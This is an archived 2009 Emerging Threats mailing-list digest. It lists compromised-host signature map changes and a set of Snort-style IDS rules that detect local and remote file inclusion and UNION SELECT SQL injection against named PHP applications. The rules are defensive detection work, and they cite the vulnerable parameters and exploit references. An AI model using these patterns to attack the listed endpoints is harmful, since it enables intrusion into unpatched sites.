url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500199 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500200 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500201 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500202 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500203 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500204 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500205 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500206 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500207 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500208 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500209 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500210 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500211 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500212 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (107) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500213 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500215 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (114) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510170 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510171 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510172 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510173 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510174 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510175 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510176 || ET COMPROMISED Known Compromised or Hostile Host 
Traffic TCP - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510177 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510178 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510179 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510180 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510181 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510182 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510183 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510184 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510185 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510186 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510187 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510188 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510189 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (95) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510190 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510191 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510192 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510193 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510194 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510195 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510196 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510197 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510198 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510199 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510200 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510201 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510202 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (102) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510203 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510204 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510205 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510206 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510207 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510208 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510209 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510210 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510211 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510212 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510213 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510215 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (108) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (115) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (129): 2009126 || ET TROJAN Possible bot C&C Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2009126 2500170 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500171 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500172 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500173 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500174 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500175 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500176 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (89) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500177 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500178 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500179 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500180 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500181 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500182 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500183 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500184 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500185 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500186 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500187 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500188 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500189 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500190 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (96) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500191 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500192 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500193 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500194 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500195 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500196 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500197 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500198 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500199 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500200 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500201 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500202 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500203 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500204 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (103) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500205 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500206 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500207 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500208 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500209 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500210 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500211 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500212 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500213 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500214 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500215 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500216 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500217 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500218 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (110) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500219 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (117) || 
From emerging at emergingthreats.net Sun Aug 9 16:00:12 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sun, 9 Aug 2009 16:00:12 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090809200012.AE4114504A@goliath.jonkmans.com>

[***] Results from Oinkmaster started Sun Aug 9 16:00:12 2009 [***]

[*] Rules modifications: [*]
    None.

[+++] Added non-rule lines: [+++]

     -> Added to emerging-sid-msg.map (88):
     -> Added to emerging-sid-msg.map.txt (88):
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510212 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510213 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From jonkman at jonkmans.com Mon Aug 10 12:49:12 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Mon, 10 Aug 2009 12:49:12 -0400 Subject: [Emerging-Sigs] StillSecure: 30 New Signatures - Aug - 05 - 2009 In-Reply-To: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2937@webmail.latis.com> References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2937@webmail.latis.com> Message-ID: <4A804F88.6050805@jonkmans.com> Posted, thanks!! Matt signatures wrote: > Hi Matt, > > Please find 30 New Signatures below: > > 1. *WEB-PHP Flatchat pmscript.php with Parameter Local File Inclusion* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > Flatchat pmscript.php with Parameter Local File Inclusion"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/pmscript.php?"; nocase; uricontent:"with="; nocase; > content:"../"; classtype:web-application-attack; > reference:url,milw0rm.com/exploits/8549; reference:bugtraq,34734; > sid:2009503; rev:1;) > > 2. *WEB-PHP ECShop user.php order_sn Parameter SQL Injection* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > ECShop user.php order_sn Parameter SQL Injection"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/user.php?"; nocase; uricontent:"act=order_query"; nocase; > uricontent:"order_sn="; nocase; uricontent:"UNION"; nocase; > uricontent:"SELECT"; nocase; pcre:"/UNION.+SELECT/Ui"; > classtype:web-application-attack; reference:bugtraq,34733; > reference:url,milw0rm.com/exploits/8548; sid:2009504; rev:1;) > > 3. 
*WEB-PHP 1024 CMS standard.php page_include Parameter Remote > File Inclusion* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > 1024 CMS standard.php page_include Parameter Remote File Inclusion"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/layouts/standard.php?"; nocase; uricontent:"page_include="; > nocase; pcre:"/page_include=\s*(https?|ftps?|php)\:\//Ui"; > classtype:web-application-attack; > reference:url,vupen.com/english/advisories/2009/0360; > reference:url,milw0rm.com/exploits/8003; sid:2009506; rev:1;) > > 4. *WEB-PHP AvailScript Photo Album Script pics.php sid Parameter > SQL Injection* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > AvailScript Photo Album Script pics.php sid Parameter SQL Injection"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/pics.php?"; nocase; uricontent:"sid="; nocase; > uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; > pcre:"/UNION.+SELECT/Ui"; classtype:web-application-attack; > reference:bugtraq,31085; reference:url,milw0rm.com/exploits/6411; > sid:2009518; rev:1;) > > 5. *WEB-PHP pHNews comments.php templates_dir Local File Inclusion* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > pHNews comments.php templates_dir Local File Inclusion"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/modules/comments.php?"; nocase; > uricontent:"templates_dir="; nocase; content:"../"; > classtype:web-application-attack; > reference:url,milw0rm.com/exploits/6000; reference:bugtraq,19838; > sid:2009519; rev:1;) > > 6. 
*WEB-PHP pHNews comments.php template Local File Inclusion* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > pHNews comments.php template Local File Inclusion"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/modules/comments.php?"; nocase; uricontent:"template="; > nocase; content:"../"; classtype:web-application-attack; > reference:url,milw0rm.com/exploits/6000; reference:bugtraq,19838; > sid:2009520; rev:1;) > > 7. *WEB-PHP QuickTeam qte_web.php qte_web_path Parameter Local > File Inclusion* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > QuickTeam qte_web.php qte_web_path Parameter Local File Inclusion"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/qte_web.php?"; nocase; uricontent:"qte_web_path="; nocase; > content:"../"; classtype:web-application-attack; > reference:url,secunia.com/advisories/34997/; > reference:url,milw0rm.com/exploits/8602; sid:2009522; rev:1;) > > 8. *WEB-PHP QuickTeam qte_web.php qte_web_path Parameter Remote > File Inclusion* > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP > QuickTeam qte_web.php qte_web_path Parameter Remote File Inclusion"; > flow:to_server,established; content:"GET "; depth:4; > uricontent:"/qte_web.php?"; nocase; uricontent:"qte_web_path="; nocase; > pcre:"/qte_web_path=\s*(ftps?|https?|php)\:\//Ui"; > classtype:web-application-attack; > reference:url,secunia.com/advisories/34997/; > reference:url,milw0rm.com/exploits/8602; sid:2009523; rev:1;) > > 9. 
